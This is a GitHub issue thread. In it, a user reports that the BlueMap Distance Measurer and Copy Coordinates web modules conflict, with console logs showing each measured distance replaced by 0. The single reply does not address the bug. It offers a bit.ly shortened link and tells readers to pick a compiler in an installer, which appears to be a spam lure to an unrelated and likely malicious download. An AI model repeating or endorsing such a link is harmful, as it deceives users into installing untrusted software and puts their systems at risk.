### ISSUE TITLE
Using Distance Measurer and Copy Coordinates web module together.

### ISSUE THREAD

**Issue by Zefire85** [TechnicJelle/BlueMapWebAddons#3]
When I use the "Distance Measurer" web module with the "Copy Coordinates" web module, the ruler disappears. The white line is about 1 pixel long.
It's like I'm selecting the same block twice, but I'm actually clicking on two different blocks.

In my browser's developer tool, I see that the distance is measured correctly a first time, but the result is systematically replaced by 0.

Developer console:
Distance between 51,-1,88 and 376,-1,290 is 382.6604238747456
Distance between 376,-1,290 and 376,-1,290 is 0

Distance between 376,-1,290 and -398,-1,37 is 814.3003131523407
Distance between -398,-1,37 and -398,-1,37 is 0

Distance between -398,-1,37 and -217,-1,477 is 475.77410606295086
Distance between -217,-1.477 and -217,-1.477 is 0

![Image](https://github.com/user-attachments/assets/8e559b20-4599-49d9-ba42-22504f21a094)

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
